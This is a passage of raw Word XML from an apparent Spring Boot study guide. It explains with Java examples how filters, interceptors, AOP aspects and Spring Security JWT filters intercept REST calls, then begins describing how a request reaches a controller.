    <w:p w14:paraId="3E1D29C9"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How REST Calls are Intercepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8D05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Filters (Servlet Filters)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBEA9DF" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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Filters are part of the Servlet API and can be used to intercept and modify HTTP requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87B671" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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Filters are useful for tasks like logging, authentication, and modifying headers or request bodies before they are processed by the rest of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6ECC25" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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You can define a filter that will be applied globally across your REST endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A58AB"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 Custom Filter in Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42487EEC"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723A05AA"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CustomFilter implements Filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8341C"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3D8A2"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doFilter(ServletRequest request, ServletResponse response, FilterChain chain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA9D1D"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hrows IOException, ServletException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA287F"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HttpServletRequest httpServletRequest = (HttpServletRequest) request;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F04422"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Log request details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972CEC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ystem.out.println("Request Method: " + httpServletRequest.getMethod());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34747174"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chain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723146F4"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677BFA58" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3FFDFA"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF2AE7"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init(FilterConfig filterConfig) throws ServletException {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D938C" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB21B1A"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6ABF4"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destroy() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFA50D"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022BD5C5"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this example, the CustomFilter intercepts the request and prints the HTTP method of the incoming request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4855C"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o register the filter, you can create a FilterRegistrationBean in a @Configuration class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D0D5D"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A68BB2"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FilterConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049D626"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA94946"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FilterRegistrationBean&lt;CustomFilter&gt; loggingFilter() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786CB142"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FilterRegistrationBean&lt;CustomFilter&gt; registrationBean = new FilterRegistrationBean&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD91EF8"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gistrationBean.setFilter(new CustomFilter());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308602CF"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gistrationBean.addUrlPatterns("/api/*");  // Apply filter to all API URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20269CA3"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registrationBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0453E01A"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20C8F27B"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80B1287"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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2A793" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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 MVC Interceptors are part of the HandlerInterceptor interface and provide more flexibility than filters. They can be used to intercept HTTP requests and responses at different points in the lifecycle, such as before and after a controller method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7386C6" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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terceptors are commonly used for tasks like authentication, logging, and modifying the response before sending it to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0621A3" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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terceptors have access to the HandlerMethod, which represents the actual method being executed by a controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18453D8A"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 Custom Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33568A03"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F95562"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CustomInterceptor implements HandlerInterceptor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D3E3C"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67594F06"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boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839811A"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hrows Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011AC02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Logic before the controller method is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B503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ystem.out.println("Request URL: " + request.getRequestURL());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365248D2"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true; // Continue processing the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC06DB2"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2A3CEB21" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1523E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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C106497"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postHandle(HttpServletRequest request, HttpServletResponse response, Object handler,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEFA389"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ModelAndView modelAndView) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63619ED3"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Logic after the controller method is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316FFC3"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145EA007" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2DEB43"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 xml:space="preserve">    @Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A71E17"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afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A2D66"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hrows Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC821D"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Logic after the request has been completely processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35486721"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5A9399A"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38138FE7"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gister the interceptor in a configuration class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61846B48"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014853F"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WebConfig implements WebMvcConfigurer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E487E6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5E2712CF"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CustomInterceptor customInterceptor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0968AB" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300116F4"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA5646"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addInterceptors(InterceptorRegistry registry) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C87C8"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gistry.addInterceptor(customInterceptor).addPathPatterns("/api/**"); // Apply to specific paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4261E104"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40023CBB"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30E0A973"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spect-Oriented Programming (AOP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1809D" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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OP allows you to apply cross-cutting concerns such as logging, security, or transaction management to your REST calls without modifying the business logic of the application. Spring AOP provides a way to intercept method calls at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413FC6B9" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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ing @Aspect and @Around annotations, you can create custom aspects that are executed before or after the actual method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7902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 Logging Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2320E9"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spect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB24935"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF69CC"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LoggingAspect {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A6E08" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADC0836"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round("execution(* com.example.controller.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6634019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Object logRestCall(ProceedingJoinPoint joinPoint) throws Throwable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742EE9E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Log request details before method execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D14001"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ystem.out.println("Intercepting method: " + joinPoint.getSignature().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491399B"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bject result = joinPoint.proceed();  // Proceed with the actual method execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BE7F2"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Log response details after method execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADDF354"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ystem.out.println("Method executed: " + joinPoint.getSignature().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC8AC5"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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F49CAD"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172B9575"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7E115F99"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aspect intercepts the controller methods and logs the method name before and after execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8D7653"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ring Security Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D015731" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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For security purposes, you can configure filters in Spring Security to intercept and authenticate/authorize incoming requests. For example, filters can check the JWT token or session cookie before proceeding with the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AFB8C" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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ensures that only authorized users can access specific REST endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0410F05F"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 Custom Spring Security Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E21D11"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3581E3A0"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JwtAuthenticationFilter extends OncePerRequestFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530651C8" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347C4BA2"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6E67DC"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otected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain filterChain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69932CE0"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hrows ServletException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D71E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Extract JWT token from request header and validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40788829"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tring token = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C586C"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if (token != null &amp;&amp; token.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A904AB"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Extract and validate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16250172"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 xml:space="preserve">            String jwtToken = token.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B5266B"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if (validateToken(jwtToken)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F8C98"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Set the security context if token is valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22118620"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ecurityContextHolder.getContext().setAuthentication(getAuthentication(jwtToken));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15534A7A"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75CDD6C"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00A74D6F"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filterChain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D523C98"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46EB5F92"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EBE4CE7"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How the Call Happens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75990871"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lient makes a REST call</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., GET, POST) to a Spring Boot API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE5BEA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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if configured) first intercept the request and can log, authenticate, or modify the request before passing it to the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0D4C8"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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if configured) may also process the request at various stages, such as before or after the controller method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FBFA5"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f </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is configured, the SecurityFilterChain or custom security filters will validate the request (e.g., checking JWT tokens or session cookies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E7DF41"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ontroller method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes the request, interacts with services or repositories, and returns a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C90F0"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ost-processing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> happens through interceptors (e.g., modifying the response) or aspects (e.g., logging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5101163C"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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is sent back to the client, either after filters or interceptors modify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEEDD7"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ummary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B7161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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to intercept requests and responses at the servlet level for tasks like logging or authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED83B89"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Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offer more control at the Spring MVC layer, providing hooks before and after controller execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870F147"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OP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows cross-cutting concerns like logging and security to be applied declaratively without changing the underlying logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE50A09"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ring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> filters are used to secure the REST endpoints by intercepting and validating requests based on security configurations (e.g., JWT token validation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BEBB90"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ach of these mechanisms can intercept REST calls and add functionality like logging, security, or response modification in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0F8FA" w14:textId="59125DA0"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87419E6">
          <v:rect id="_x0000_i2674" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57BD66" w14:textId="32CEDA32" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="639" w:name="_Toc196308119"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When I hit a URL how data will be invoked with your application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="639"/>
    </w:p>
    <w:p w14:paraId="764FC504" w14:textId="1DA5CC95" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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hen you hit a URL in a Spring Boot application, the following steps take place to invoke the relevant data or process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D462A0E"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Request Received by the Server (Tomcat/Embedded Server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C841D0"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When you send a request (e.g., via a browser or Postman) to a URL (e.g., http://localhost:8080/api/resource), the request is first received by the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>embedded server</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (typically, Tomcat, Jetty, or Undertow) that Spring Boot uses by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891A39A"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URL Matching by DispatcherServlet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E1906"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the front controller in Spring MVC, and its job is to dispatch incoming HTTP requests to the appropriate controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752B8FF"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DispatcherServlet is configured in Spring Boot through the application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8FE2DA"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t matches the URL of the request with the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> configured in the controller classes via annotations like @RequestMapping, @GetMapping, @PostMapping, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FECBB1"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Controller Mapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED920F1"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Spring Boot uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
